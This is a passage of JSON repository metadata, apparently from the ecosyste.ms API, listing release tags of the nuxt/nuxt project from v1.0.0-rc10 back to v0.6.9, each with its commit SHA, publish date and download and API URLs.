rl":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nu